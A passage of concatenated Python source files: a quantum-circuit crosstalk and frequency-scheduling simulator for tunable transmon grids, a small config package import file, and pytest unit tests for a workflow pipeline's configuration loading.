np.zeros(num_q) active_list = [False for i in range(num_q)] success_rate = 1.0 tot_success = 0.0 tot_cnt = 0 max_colors = 0 # max number of colors used worst_success = 1.0 # Check scheduler if (scheduler == 'hybrid'): print("Hybrid scheduler to be implemented.") sys.exit(2) else: #leftover = [] #left_gates= [] layers = get_layer_circuits(circ_mapped) qubit_freqs = _initial_frequency() num_layers = len(layers) idx = 0 total_time = 0.0 # ns total_tcz = 0.0 alphas = [ALPHA for f in qubit_freqs] #TODO if verbose == 0: print("Num of layers:", num_layers) # total number of gates decomposed with iswap and cphase, used only if d=flexible num_iswap = 0 num_cphase = 0 num_cnot = 0 num_swap = 0 #while (idx < num_layers or len(leftover) > 0): for idx in range(num_layers): all_gates = [] layer_circuit = layers[idx] if verbose == 0: print(layer_circuit) print(idx, "-----------------") if decomp == 'flexible': if verbose == 0: print("Decompose layer", idx) decomp_layer, temp_iswap, temp_cphase, temp_cnot, temp_swap = decompose_layer_flexible(layer_circuit, G_crosstalk, verbose) num_iswap += temp_iswap num_cphase += temp_cphase num_cnot += temp_cnot num_swap += temp_swap else: decomp_layer = decompose_layer(layer_circuit, decomp) if (scheduler == 'greedy'): resched_layer = reschedule_layer(decomp_layer, coupling, verbose) else: resched_layer = decomp_layer if lim_colors > 0: resched_layer = limit_colors(resched_layer, lim_colors, G_crosstalk, verbose) for layer in resched_layer: print(layer.qasm()) # Pre-fill edges for constructing (undirected) xtalk graph #edges = [leftover[i//2] if i%2==0 else (leftover[i//2][1], leftover[i//2][0]) for i in range(2*len(leftover))] edges = [] edges_cphase = [] # if (q1,q2) is in it, then (q2,q1) is also in it edges_iswaps = [] # if (q1,q2) is in it, then (q2,q1) is also in it #curr_gates = [e for e in left_gates] #leftover = [] #left_gates = [] taus = {} # For storing coupling times gt = 0.0 layer_time = 0.0 barrier = False for _, qargs, _ in layer.data: if len(qargs) == 2: q1, q2 = qargs[0].index, qargs[1].index edge = (q1, q2) edges.append(edge) edges.append((q2,q1)) # because undirected graph #print("+Edges:") #print(edges) if (len(edges) > 0): #idx += 1 #continue subgraph = nx.subgraph(G_crosstalk, edges) #print(G_crosstalk.nodes()) #print(subgraph.nodes()) int_coloring = nx.coloring.greedy_color(subgraph) #print("+int_coloring:") #print(int_coloring) num_int = len(set(int_coloring.values())) while lim_colors > 0 and num_int > lim_colors: # need to recolor the layer, cannot use greedy_color because it is not seeded # int_coloring = nx.coloring.greedy_color(subgraph,strategy='random_sequential') int_coloring = {} nodes = list(subgraph) np.random.shuffle(nodes) for u in nodes: # Set to keep track of colors of neighbours neighbour_colors = {int_coloring[v] for v in subgraph[u] if v in int_coloring} # Find the first unused color. temp_color = 0 while temp_color in neighbour_colors: temp_color += 1 # Assign the new color to the current node. int_coloring[u] = temp_color num_int = len(set(int_coloring.values())) if verbose == 0: print("num_int: ", num_int) int_coloring = relabel_coloring(int_coloring) if num_int > max_colors: max_colors = num_int #TODO? if num_int == 0: idx += 1 continue _add_int_color_map(color_to_freq, num_int) def _int_freq(c): omg = color_to_freq[str(c)]#+np.random.normal(0,sigma) return omg + get_flux_noise(omg, sigma) #print(layer) #print("-----------------") # Refill edges and curr_gates #edges = [e for e in leftover] edges = [] #curr_gates = [e for e in left_gates] curr_gates = [] single_qb_err = 0.0015 single_qb_err_acc = 1.0 for g, qargs, _ in layer.data: if g.name == "barrier": barrier = True if g.name == "measure": continue #print(qargs) #print(qargs[0].index) if len(qargs) == 1: # single qubit gates all_gates.append((g.qasm(),(qargs[0].index, -1))) active_list[qargs[0].index] = True gt = GATETIMES[g.name] if gt > layer_time: layer_time = gt single_qb_err_acc *= 1 - single_qb_err elif len(qargs) == 2: q1, q2 = qargs[0].index, qargs[1].index active_list[q1] = True active_list[q2] = True edges.append((q1, q2)) curr_gates.append((g.qasm(),(q1, q2))) try: f = _int_freq(int_coloring[(q1, q2)]) except: f = _int_freq(int_coloring[(q2, q1)]) #qubit_freqs[q1] = f #qubit_freqs[q2] = f if (g.name == 'unitary' and g.label == 'iswap'): qubit_freqs[q1] = f qubit_freqs[q2] = f taus[(q1,q2)] = np.pi / (2 * 0.5 * np.sqrt(f*f) * Cqq) edges_iswaps.append((q1,q2)) elif (g.name == 'unitary' and g.label == 'sqrtiswap'): qubit_freqs[q1] = f qubit_freqs[q2] = f taus[(q1,q2)] = 0.5 * np.pi / (2 * 0.5 * np.sqrt(f*f) * Cqq) edges_iswaps.append((q1,q2)) elif (g.name == 'cz' or g.label == 'cz'): qubit_freqs[q1] = f qubit_freqs[q2] = f - alphas[q2] # b/c match f1 with f2+alpha taus[(q1,q2)] = np.pi / (np.sqrt(2) * 0.5 * np.sqrt(f*f) * Cqq) # f is interaction freq edges_cphase.append((q1,q2)) else: print("Gate %s(%s) not recognized. Supports iswap, sqrtiswap, cz." % (g.name, g.label)) t_2q[q1] += taus[(q1,q2)] t_2q[q2] += taus[(q1,q2)] success_rate *= single_qb_err_acc #if (scheduler == 'greedy'): # edges, leftover, ind = greedy_reschedule(coupling, edges) # for i in range(len(ind)): # if (ind[i]): # all_gates.append(curr_gates[i]) # else: # left_gates.append(curr_gates[i]) #else: # for i in range(len(curr_gates)): # all_gates.append(curr_gates[i]) for i in range(len(curr_gates)): all_gates.append(curr_gates[i]) #print("edges:") #print(edges) print("qubit_freqs:") print(qubit_freqs) #err = compute_crosstalk(edges, coupling, qubit_freqs) if barrier: err, swap_err, leak_err = 0.0, 0.0, 0.0 gt = 0.0 else: if decomp == 'iswap': gt = get_max_time(gt, taus) err, swap_err, leak_err = compute_crosstalk_iswaps(edges_iswaps, coupling, qubit_freqs, taus, gt) #gt = get_iswap_time(edges, qubit_freqs, taus) elif decomp == 'cphase': gt = get_max_time(gt, taus) err, swap_err, leak_err = compute_crosstalk_cphase(edges_iswaps, coupling, qubit_freqs, taus, gt) #gt = get_cphase_time(edges, qubit_freqs, taus) elif decomp == 'flexible' or decomp == 'mixed': gt = get_max_time(gt, taus) err, swap_err, leak_err = compute_crosstalk_flexible(edges_cphase, edges_iswaps, coupling, qubit_freqs, taus, gt) #gt_iswap = get_iswap_time(edges_iswaps, qubit_freqs, tau_special) #gt_cphase = get_cphase_time(edges_cphase, qubit_freqs, tau_special) #gt = max(gt_iswap, gt_cphase) else: print("Decomposition method %s not recognized. Try iswap, cphase, or flexible." % decomp) gt = 0.0 if gt > layer_time: layer_time = gt for qubit in range(num_q): if active_list[qubit]: t_act[qubit] += layer_time if verbose == 0: print("Layer success: %12.10f (swap: %12.10f, leak: %12.10f)" % (1-err, swap_err, leak_err)) print("Layer time:", layer_time) update_data(freqsdata, gatesdata, qubit_freqs, all_gates, num_q) success_rate *= 1 - err # Reset the frequencies for (q1, q2) in edges: qubit_freqs[q1] = _park_freq(park_coloring[q1]) qubit_freqs[q2] = _park_freq(park_coloring[q2]) if not barrier: tot_success += (1 - err)*single_qb_err_acc tot_cnt += 1 worst_success = min(worst_success, 1 - err) total_time += layer_time idx += 1 write_circuit(freqsdata, gatesdata, outf) avg_success = tot_success / tot_cnt if decomp=='flexible' and verbose == 0: print("Total number of CNOT gates:", num_cnot) print("Total number of SWAP gates:", num_swap) print("Total number of 2-qubit gates that are decomposed with iSWAP:", num_iswap) if num_iswap+num_cphase > 0: print("Proportion:",num_iswap/(num_iswap+num_cphase)) print("Total number of 2-qubit gates that are decomposed with CPHASE:", num_cphase) if num_iswap+num_cphase > 0: print("Proportion:",num_cphase/(num_iswap+num_cphase)) return success_rate, avg_success, worst_success, idx, tot_cnt, total_time, max_colors, t_act, t_2q def gen_tiling_pattern(device): # Generate coupler activation pattern, assume 2D grid of qubits width = device.side_length height = device.side_length num_q = width * height patternA = [] patternB = [] patternC = [] patternD = [] def _qubit_number(row, col): return row * width + col # horizontal edges for row in range(height): for col in range(width - 1): if (col+row)%2 == 1: patternC.append((_qubit_number(row, col), _qubit_number(row, col + 1))) else: patternD.append((_qubit_number(row, col), _qubit_number(row, col + 1))) #coupling_list.append((_qubit_number(row, col), _qubit_number(row, col + 1))) #if directed: # coupling_list.append((_qubit_number(row, col + 1), _qubit_number(row, col))) # vertical edges for col in range(width): for row in range(height - 1): if (col+row)%2 == 1: patternB.append((_qubit_number(row, col), _qubit_number(row + 1, col))) else: patternA.append((_qubit_number(row, col), _qubit_number(row + 1, col))) #coupling_list.append((_qubit_number(row, col), _qubit_number(row + 1, col))) #if directed: # coupling_list.append((_qubit_number(row + 1, col), _qubit_number(row, col))) return [patternA,patternB,patternC,patternD,patternC,patternD,patternA,patternB] def success_rate_google_like(device, circuit, scheduler, d, decomp, outfile, verbose): # Full coloring with tunable transmon # Called when freq=google, also supporting scheduler=tiling outf = h5py.File(outfile + ".hdf5", "w") # output data stores the information needed for hamiltonian simulation # Groups: freqs and gates (for each timestep) # Dataset format: [list of freqs for each timestep] # groups of [('gatename',list of qubits)] freqsdata = [] gatesdata = [] width = device.side_length height = device.side_length num_q = width * height omega_max = device.omega_max delta_int = device.delta_int delta_ext= device.delta_ext delta_park = device.delta_park tilings = gen_tiling_pattern(device) G_connect = get_connectivity_graph(width, height) # park_coloring = nx.coloring.greedy_color(G_connect) # num_park = len(set(park_coloring.values())) G_crosstalk = get_aug_line_graph(width, height, d) int_freqs = {} if num_q == 4: int_freqs = {(0,1):6.619, (0,2):6.65, (1,3):6.657, (2,3):6.677} park_freqs = {0:6.605,1:6.638,2:6.694,3:6.681} elif num_q == 9: park_freqs = {0:6.605,1:6.638,2:6.565,3:6.694,4:6.681,5:6.601,6:6.643,7:6.621,8:6.646} int_freqs = {(0,1):6.619, (1,2):6.601, (3,4):6.677, (4,5):6.635, (6,7):6.631, (7,8):6.646, (0,3):6.65, (1,4):6.657, (2,5):6.585, (3,6):6.667, (4,7):6.645,(5,8):6.646} elif num_q == 16: park_freqs = {0:6.605,1:6.638,2:6.565,3:6.555,4:6.694,5:6.681,6:6.601,7:6.626,8:6.643,9:6.621,10:6.646,11:6.657,12:6.712,13:6.671,14:6.586,15:6.623} int_freqs = {(0,1):6.619,(1,2):6.601,(2,3):6.565,(4,5):6.677,(5,6):6.635,(6,7):6.595} int_freqs[(8,9)] = 6.631 int_freqs[(9,10)] = 6.646 int_freqs[(10,11)] = 6.646 int_freqs[(12,13)] = 6.69 int_freqs[(13,14)] = 6.631 int_freqs[(14,15)] = 6.623 int_freqs[(0,4)] = 6.65 int_freqs[(1,5)] = 6.657 int_freqs[(2,6)] = 6.585 int_freqs[(3,7)] = 6.592 int_freqs[(4,8)] = 6.667 int_freqs[(5,9)] = 6.645 int_freqs[(6,10)] = 6.646 int_freqs[(7,11)] = 6.642 int_freqs[(8,12)] = 6.68 int_freqs[(9,13)] = 6.645 int_freqs[(10,14)] = 6.646 int_freqs[(11,15)] = 6.633 num_int = len(set(int_freqs.values())) # num_park = len(set(park_freqs.values())) #print(int_coloring) # num_int = len(set(int_coloring.values())) # def _build_color_map(): # negative colors for parking, non-negative colors for interaction. # step_park = delta_park / num_park # step_int = delta_int / num_int # colormap = dict() # for c in range(num_int): # colormap[str(c)] = omega_max - c * step_int # for c in range(num_park): # colormap[str(-(c+1))]= omega_max - delta_int - delta_ext - c * step_park # return colormap # color_to_freq = _build_color_map() # def _park_freq(c): # omg = color_to_freq[str(-(c+1))]#+np.random.normal(0,sigma) # return omg + get_flux_noise(omg, sigma) # def _int_freq(c): # omg = color_to_freq[str(c)]#+np.random.normal(0,sigma) # return omg + get_flux_noise(omg, sigma) def _initial_frequency(): freqs = dict() for q in range(width*height): freqs[q] = park_freqs[q] return freqs t_act = np.zeros(num_q) t_2q = np.zeros(num_q) active_list = [False for i in range(num_q)] success_rate = 1.0 single_qb_err = 0.0015 tot_success = 0.0 tot_cnt = 0 worst_success = 1.0 max_colors = num_int # max number of colors used # Mapping coupling = get_nearest_neighbor_coupling_list(width, height) circ_mapped = get_map_circuit(circuit, coupling) Cqq = CQQ #circuit.draw(output='mpl') # Check scheduler if (scheduler == 'hybrid'): print("Hybrid scheduler to be implemented.") sys.exit(2) else: # scheduler == qiskit or greedy layers = get_layer_circuits(circ_mapped) qubit_freqs = _initial_frequency() alphas = [ALPHA for f in qubit_freqs] #TODO #leftover = [] #left_gates= [] num_layers = len(layers) idx = 0 pattern_offset = 0 total_time = 0.0 # in ns # total number of gates decomposed with iswap and cphase, used only if d=flexible num_iswap = 0 num_cphase = 0 num_cnot = 0 num_swap = 0 #while (idx < num_layers or len(leftover) > 0): tiling_idx = 0 for idx in range(num_layers): all_gates = [] layer_circuit = layers[idx] if verbose == 0: print(layer_circuit) print(idx, "-----------------") #print('leftover len: ' + str(len(leftover))) #print('left_gates len: ' + str(len(left_gates))) #decomp_layer = decompose_layer(layer_circuit, decomp) if decomp == 'flexible': if verbose == 0: print("Decompose layer", idx) decomp_layer, temp_iswap, temp_cphase, temp_cnot, temp_swap = decompose_layer_flexible(layer_circuit, G_crosstalk, verbose) num_iswap += temp_iswap num_cphase += temp_cphase num_cnot += temp_cnot num_swap += temp_swap else: decomp_layer = decompose_layer(layer_circuit, decomp) if (scheduler == 'greedy'): resched_layer = reschedule_layer(decomp_layer, coupling, verbose) elif (scheduler == 'tiling'): resched_layer, pattern_offset, patterns = tiling_layer(decomp_layer, tilings, pattern_offset, verbose) print(patterns) else: resched_layer = decomp_layer #print("Layers: %d %d" % (len(decomp_layer), len(resched_layer))) for (iid,layer) in enumerate(resched_layer): if (scheduler == 'tiling'): tiling_idx = patterns[iid] print("tiling_idx", tiling_idx) print(layer.qasm()) edges = [] edges_cphase = [] # if (q1,q2) is in it, then (q2,q1) is also in it edges_iswaps = [] # if (q1,q2) is in it, then (q2,q1) is also in it #edges = [e for e in leftover] #curr_gates = [e for e in left_gates] curr_gates = [] taus = {} # For storing couplings that needed sqrt iswaps gt = 0.0 layer_time = 0.0 # ns barrier = False single_qb_err = 0.0015 for g, qargs, _ in layer.data: #print(g, qargs) #print(g.qasm()) if g.name == "barrier": barrier = True if g.name == "measure": continue if len(qargs) == 1: all_gates.append((g.qasm(),(qargs[0].index, -1))) active_list[qargs[0].index] = True gt = GATETIMES[g.name] if gt > layer_time: layer_time = gt success_rate *= 1 - single_qb_err if len(qargs) == 2: q1, q2 = qargs[0].index, qargs[1].index active_list[q1] = True active_list[q2] = True edges.append((q1, q2)) #print((q1,q2)) curr_gates.append((g.qasm(),(q1, q2))) try: f = int_freqs[(q1,q2)] except: f = int_freqs[(q2,q1)] #print('freq:',f) if (g.name == 'unitary' and g.label == 'iswap'): qubit_freqs[q1] = f qubit_freqs[q2] = f taus[(q1,q2)] = np.pi / (2 * 0.5 * np.sqrt(f*f) * Cqq) edges_iswaps.append((q1,q2)) elif (g.name == 'unitary' and g.label == 'sqrtiswap'): qubit_freqs[q1] = f qubit_freqs[q2] = f #tau_special[(q1,q2)] = 0.5 taus[(q1,q2)] = 0.5 * np.pi / (2 * 0.5 * np.sqrt(f*f) * Cqq) edges_iswaps.append((q1,q2)) elif (g.name == 'cz' or g.label == 'cz'): qubit_freqs[q1] = f qubit_freqs[q2] = f - alphas[q2] # b/c match f1 with f2+alpha taus[(q1,q2)] = np.pi / (np.sqrt(2) * 0.5 * np.sqrt(f*f) * Cqq) # f is interaction freq edges_cphase.append((q1,q2)) else: print("Gate %s(%s) not recognized. Supports iswap, sqrtiswap, cz." % (g.name, g.label)) t_2q[q1] += taus[(q1,q2)] t_2q[q2] += taus[(q1,q2)] #if (scheduler == 'greedy'): # edges, leftover, ind = greedy_reschedule(coupling, edges) # for i in range(len(ind)): # if (ind[i]): # all_gates.append(curr_gates[i]) # else: # left_gates.append(curr_gates[i]) #else: # for i in range(len(curr_gates)): # all_gates.append(curr_gates[i]) for i in range(len(curr_gates)): all_gates.append(curr_gates[i]) #print("all_gates:") #print(all_gates) #print("edges:") #print(edges) #print("leftover:") #print(leftover) #print("qubit_freqs:") #print(qubit_freqs) #err = compute_crosstalk(edges, coupling, qubit_freqs) print("qubit_freqs:") print(qubit_freqs) if barrier: err, swap_err, leak_err = 0.0, 0.0, 0.0 gt = 0.0 else: if decomp == 'iswap': #err, swap_err, leak_err = compute_crosstalk_iswaps(edges, coupling, qubit_freqs, tau_special) #gt = get_iswap_time(edges, qubit_freqs, tau_special) gt = get_max_time(gt, taus) if scheduler == 'tiling': err, swap_err, leak_err = compute_crosstalk_iswaps_gmon(edges_iswaps, coupling, qubit_freqs, taus, gt, tilings, tiling_idx) else: err, swap_err, leak_err = compute_crosstalk_iswaps(edges_iswaps, coupling, qubit_freqs, taus, gt) elif decomp == 'cphase': gt = get_max_time(gt, taus) if scheduler == 'tiling': err, swap_err, leak_err = compute_crosstalk_cphase_gmon(edges_iswaps, coupling, qubit_freqs, taus, gt, tilings, tiling_idx) else: err, swap_err, leak_err = compute_crosstalk_cphase(edges_iswaps, coupling, qubit_freqs, taus, gt) #err, swap_err, leak_err = compute_crosstalk_cphase(edges, coupling, qubit_freqs, tau_special) #gt = get_cphase_time(edges, qubit_freqs, tau_special) elif decomp == 'flexible' or decomp == 'mixed': gt = get_max_time(gt, taus) if scheduler == 'tiling': err, swap_err, leak_err = compute_crosstalk_flexible_gmon(edges_cphase, edges_iswaps, coupling, qubit_freqs, taus, gt, tilings, tiling_idx) print("Err,swap_err,leak_err:", err, swap_err, leak_err) else: err, swap_err, leak_err = compute_crosstalk_flexible(edges_cphase, edges_iswaps, coupling, qubit_freqs, taus, gt) else: print("Decomposition method %s not recognized. Try iswap or cphase." % decomp) gt = 0.0 if gt > layer_time: layer_time = gt for qubit in range(num_q): if active_list[qubit]: t_act[qubit] += layer_time update_data(freqsdata, gatesdata, qubit_freqs, all_gates, num_q) success_rate *= 1 - err if verbose == 0: print("Layer success: %12.10f (swap: %12.10f, leak: %12.10f)" % (1-err, swap_err, leak_err)) print("Layer time:", layer_time) # Reset the frequencies for (q1, q2) in edges: qubit_freqs[q1] = park_freqs[q1] qubit_freqs[q2] = park_freqs[q2] if not barrier: tot_success += 1 - err tot_cnt += 1 worst_success = min(worst_success, 1 - err) total_time += layer_time #idx += 1 write_circuit(freqsdata, gatesdata, outf) avg_success = tot_success / tot_cnt if decomp=='flexible' and verbose == 0: print("Total number of CNOT gates:", num_cnot) print("Total number of SWAP gates:", num_swap) print("Total number of 2-qubit gates that are decomposed with iSWAP:", num_iswap) if num_iswap+num_cphase > 0: print("Proportion:",num_iswap/(num_iswap+num_cphase)) print("Total number of 2-qubit gates that are decomposed with CPHASE:", num_cphase) if num_iswap+num_cphase > 0: print("Proportion:",num_cphase/(num_iswap+num_cphase)) return success_rate, avg_success, worst_success, idx, tot_cnt, total_time, max_colors, t_act, t_2q def _tests(): """A function to run tests on the module""" theta = [np.random.random() for _ in range(8)] circuit = get_uccsd_circuit('LiH', theta) print(circuit) if __name__ == "__main__": _tests()

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30c6a67c6ec7c942e1e276f80541a9313a75eadc

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py

Python

torpido/config/__init__.py

AP-Atul/Torpido

a646b4d6de7f2e2c96de4c64ce3113f53e3931c2

[ "Unlicense" ]

21

2020-12-23T07:13:10.000Z

2022-01-12T10:32:22.000Z

torpido/config/__init__.py

AP-Atul/Torpido

a646b4d6de7f2e2c96de4c64ce3113f53e3931c2

[ "Unlicense" ]

2

2020-12-30T10:45:42.000Z

2021-09-25T09:52:00.000Z

torpido/config/__init__.py

AP-Atul/Torpido

a646b4d6de7f2e2c96de4c64ce3113f53e3931c2

[ "Unlicense" ]

1

2021-02-06T21:39:41.000Z

from torpido.config.cache import * from torpido.config.config import * from torpido.config.constants import *

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py

Python

tests/magnus/test_pipeline.py

vishalbelsare/magnus-core

77a4eb8ecca70b276b48e5f7a11166f7c3196f6b

[ "Apache-2.0" ]

17

2022-01-25T09:04:25.000Z

2022-02-08T21:02:16.000Z

tests/magnus/test_pipeline.py

project-magnus/magnus-core

2e012803fadc8552a7e0b974a30d72ebcd1acdfa

[ "Apache-2.0" ]

18

2022-02-02T08:28:25.000Z

2022-03-30T12:38:40.000Z

tests/magnus/test_pipeline.py

project-magnus/magnus-core

2e012803fadc8552a7e0b974a30d72ebcd1acdfa

[ "Apache-2.0" ]

2

2022-01-24T11:10:09.000Z

2022-03-15T15:19:46.000Z

import pytest from magnus import defaults, pipeline def test_load_user_extensions_does_nothing_if_no_extensions_provided(monkeypatch, mocker): mock_utils = mocker.MagicMock() mock_utils.does_file_exist = mocker.MagicMock(return_value=False) monkeypatch.setattr(pipeline, 'utils', mock_utils) pipeline.load_user_extensions() def test_load_user_extensions_reads_extension_file(monkeypatch, mocker): mock_utils = mocker.MagicMock() mock_load_yaml = mocker.MagicMock() mock_utils.does_file_exist = mocker.MagicMock(return_value=True) mock_utils.load_yaml = mock_load_yaml monkeypatch.setattr(pipeline, 'utils', mock_utils) pipeline.load_user_extensions() mock_load_yaml.assert_called_once_with(defaults.USER_CONFIG_FILE) def test_prepare_configurations_does_not_apply_variables_if_none_sent(mocker, monkeypatch): mock_utils = mocker.MagicMock() mock_load_yaml = mocker.MagicMock(return_value={'dag': 1}) mock_utils.load_yaml = mock_load_yaml monkeypatch.setattr(pipeline, 'utils', mock_utils) monkeypatch.setattr(pipeline, 'json', mocker.MagicMock()) monkeypatch.setattr(pipeline, 'graph', mocker.MagicMock()) pipeline.prepare_configurations(variables_file='', pipeline_file='', run_id=1, tag='tag', configuration_file='', use_cached=False) assert mock_load_yaml.call_count == 1 def test_prepare_configurations_apply_variables_if_sent(mocker, monkeypatch): mock_utils = mocker.MagicMock() mock_load_yaml = mocker.MagicMock(return_value={'dag': 1}) mock_utils.load_yaml = mock_load_yaml monkeypatch.setattr(pipeline, 'utils', mock_utils) monkeypatch.setattr(pipeline, 'json', mocker.MagicMock()) monkeypatch.setattr(pipeline, 'graph', mocker.MagicMock()) pipeline.prepare_configurations(variables_file='var', pipeline_file='', run_id=1, tag='tag', configuration_file='', use_cached=False) assert mock_load_yaml.call_count == 2 def test_prepare_configurations_stores_dag_hash_and_graph_to_executor(mocker, monkeypatch): mock_utils = mocker.MagicMock() mock_utils.get_dag_hash.return_value = 'hash' mock_executor_obj = mocker.MagicMock() def mock_get_provider_by_name_and_type(service_type, *args, **kwargs): if service_type == 'executor': return mock_executor_obj return mocker.MagicMock() mock_utils.get_provider_by_name_and_type = mock_get_provider_by_name_and_type mock_graph = mocker.MagicMock() mock_graph.create_graph.return_value = 1 monkeypatch.setattr(pipeline, 'utils', mock_utils) monkeypatch.setattr(pipeline, 'json', mocker.MagicMock()) monkeypatch.setattr(pipeline, 'graph', mock_graph) pipeline.prepare_configurations(variables_file='var', pipeline_file='', run_id=1, configuration_file='', tag='tag', use_cached=False) assert mock_executor_obj.dag_hash == 'hash' assert mock_executor_obj.dag == 1 # def test_prepare_configurations_uses_empty_dict_for_run_log_config_by_default(mocker, monkeypatch): # mock_utils = mocker.MagicMock() # #mock_utils.apply_variables.return_value = {'dag': 'iamadag'} # mock_service = mocker.MagicMock() # class MockProvider: # sent_in_config = None # @classmethod # def mock_get_provider_by_name_and_type(cls, service_type, service_config): # if service_type == 'run_log_store': # cls.sent_in_config = service_config # return mock_service # return mocker.MagicMock() # mock_utils.get_provider_by_name_and_type = MockProvider.mock_get_provider_by_name_and_type # monkeypatch.setattr(pipeline, 'utils', mock_utils) # monkeypatch.setattr(pipeline, 'json', mocker.MagicMock()) # monkeypatch.setattr(pipeline, 'graph', mocker.MagicMock()) # pipeline.prepare_configurations(variables_file='', pipeline_file='', run_id=1, tag='tag', use_cached=False) # assert MockProvider.sent_in_config == defaults.DEFAULT_RUN_LOG_STORE # def test_prepare_configurations_uses_config_if_passed(mocker, monkeypatch): # mock_utils = mocker.MagicMock() # mock_utils.apply_variables.return_value = {'dag': 'iamadag', 'run_log': 'run_log_config'} # mock_data_store = mocker.MagicMock() # mock_data_store_get = mocker.MagicMock() # mock_data_store.get_run_log_store = mock_data_store_get # mock_executor = mocker.MagicMock() # monkeypatch.setattr(pipeline, 'utils', mock_utils) # monkeypatch.setattr(pipeline, 'json', mocker.MagicMock()) # monkeypatch.setattr(pipeline, 'graph', mocker.MagicMock()) # monkeypatch.setattr(pipeline, 'datastore', mock_data_store) # monkeypatch.setattr(pipeline, 'catalog', mocker.MagicMock()) # monkeypatch.setattr(pipeline, 'secrets', mocker.MagicMock()) # monkeypatch.setattr(pipeline, 'executor', mock_executor) # pipeline.prepare_configurations(variables_file='', pipeline_file='', run_id=1, tag='tag', use_cached=False) # mock_data_store_get.assert_called_once_with(config='run_log_config') # def test_prepare_configurations_uses_empty_dict_for_catalog_by_default(mocker, monkeypatch): # mock_utils = mocker.MagicMock() # mock_utils.apply_variables.return_value = {'dag': 'iamadag'} # mock_catalog = mocker.MagicMock() # mock_catalog_get = mocker.MagicMock() # mock_catalog.get_catalog_handler = mock_catalog_get # mock_executor = mocker.MagicMock() # monkeypatch.setattr(pipeline, 'utils', mock_utils) # monkeypatch.setattr(pipeline, 'json', mocker.MagicMock()) # monkeypatch.setattr(pipeline, 'graph', mocker.MagicMock()) # monkeypatch.setattr(pipeline, 'datastore', mocker.MagicMock()) # monkeypatch.setattr(pipeline, 'catalog', mock_catalog) # monkeypatch.setattr(pipeline, 'secrets', mocker.MagicMock()) # monkeypatch.setattr(pipeline, 'executor', mock_executor) # pipeline.prepare_configurations(variables_file='', pipeline_file='', run_id=1, tag='tag', use_cached=False) # mock_catalog_get.assert_called_once_with({}) # def test_prepare_configurations_uses_config_for_catalog_if_provided(mocker, monkeypatch): # mock_utils = mocker.MagicMock() # mock_utils.apply_variables.return_value = {'dag': 'iamadag', 'catalog': 'catalog_config'} # mock_catalog = mocker.MagicMock() # mock_catalog_get = mocker.MagicMock() # mock_catalog.get_catalog_handler = mock_catalog_get # mock_executor = mocker.MagicMock() # monkeypatch.setattr(pipeline, 'utils', mock_utils) # monkeypatch.setattr(pipeline, 'json', mocker.MagicMock()) # monkeypatch.setattr(pipeline, 'graph', mocker.MagicMock()) # monkeypatch.setattr(pipeline, 'datastore', mocker.MagicMock()) # monkeypatch.setattr(pipeline, 'catalog', mock_catalog) # monkeypatch.setattr(pipeline, 'secrets', mocker.MagicMock()) # monkeypatch.setattr(pipeline, 'executor', mock_executor) # pipeline.prepare_configurations(variables_file='', pipeline_file='', run_id=1, tag='tag', use_cached=False) # mock_catalog_get.assert_called_once_with('catalog_config') # def test_prepare_configurations_uses_empty_dict_for_secrets_by_default(mocker, monkeypatch): # mock_utils = mocker.MagicMock() # mock_utils.apply_variables.return_value = {'dag': 'iamadag'} # mock_secrets = mocker.MagicMock() # mock_secrets_get = mocker.MagicMock() # mock_secrets.get_secrets_handler = mock_secrets_get # mock_executor = mocker.MagicMock() # monkeypatch.setattr(pipeline, 'utils', mock_utils) # monkeypatch.setattr(pipeline, 'json', mocker.MagicMock()) # monkeypatch.setattr(pipeline, 'graph', mocker.MagicMock()) # monkeypatch.setattr(pipeline, 'datastore', mocker.MagicMock()) # monkeypatch.setattr(pipeline, 'catalog', mocker.MagicMock()) # monkeypatch.setattr(pipeline, 'secrets', mock_secrets) # monkeypatch.setattr(pipeline, 'executor', mock_executor) # pipeline.prepare_configurations(variables_file='', pipeline_file='', run_id=1, tag='tag', use_cached=False) # mock_secrets_get.assert_called_once_with({}) # def test_prepare_configurations_uses_config_for_secrets_if_provided(mocker, monkeypatch): # mock_utils = mocker.MagicMock() # mock_utils.apply_variables.return_value = {'dag': 'iamadag', 'secrets': 'secrets_config'} # mock_secrets = mocker.MagicMock() # mock_secrets_get = mocker.MagicMock() # mock_secrets.get_secrets_handler = mock_secrets_get # mock_executor = mocker.MagicMock() # monkeypatch.setattr(pipeline, 'utils', mock_utils) # monkeypatch.setattr(pipeline, 'json', mocker.MagicMock()) # monkeypatch.setattr(pipeline, 'graph', mocker.MagicMock()) # monkeypatch.setattr(pipeline, 'datastore', mocker.MagicMock()) # monkeypatch.setattr(pipeline, 'catalog', mocker.MagicMock()) # monkeypatch.setattr(pipeline, 'secrets', mock_secrets) # monkeypatch.setattr(pipeline, 'executor', mock_executor) # pipeline.prepare_configurations(variables_file='', pipeline_file='', run_id=1, tag='tag', use_cached=False) # mock_secrets_get.assert_called_once_with('secrets_config') # def test_prepare_configurations_uses_empty_dict_for_executor_by_default(mocker, monkeypatch): # mock_utils = mocker.MagicMock() # mock_utils.apply_variables.return_value = {'dag': 'iamadag'} # mock_executor = mocker.MagicMock() # mock_executor_get = mocker.MagicMock() # mock_executor.get_executor_class = mock_executor_get # monkeypatch.setattr(pipeline, 'utils', mock_utils) # monkeypatch.setattr(pipeline, 'json', mocker.MagicMock()) # monkeypatch.setattr(pipeline, 'graph', mocker.MagicMock()) # monkeypatch.setattr(pipeline, 'datastore', mocker.MagicMock()) # monkeypatch.setattr(pipeline, 'catalog', mocker.MagicMock()) # monkeypatch.setattr(pipeline, 'secrets', mocker.MagicMock()) # monkeypatch.setattr(pipeline, 'executor', mock_executor) # pipeline.prepare_configurations(variables_file='', pipeline_file='', run_id=1, tag='tag', use_cached=False) # mock_executor_get.assert_called_once_with({}) # def test_prepare_configurations_uses_config_for_executor_if_provided(mocker, monkeypatch): # mock_utils = mocker.MagicMock() # mock_utils.apply_variables.return_value = {'dag': 'iamadag', 'mode': 'mode_config'} # mock_executor = mocker.MagicMock() # mock_executor_get = mocker.MagicMock() # mock_executor.get_executor_class = mock_executor_get # monkeypatch.setattr(pipeline, 'utils', mock_utils) # monkeypatch.setattr(pipeline, 'json', mocker.MagicMock()) # monkeypatch.setattr(pipeline, 'graph', mocker.MagicMock()) # monkeypatch.setattr(pipeline, 'datastore', mocker.MagicMock()) # monkeypatch.setattr(pipeline, 'catalog', mocker.MagicMock()) # monkeypatch.setattr(pipeline, 'secrets', mocker.MagicMock()) # monkeypatch.setattr(pipeline, 'executor', mock_executor) # pipeline.prepare_configurations(variables_file='', pipeline_file='', run_id=1, tag='tag', 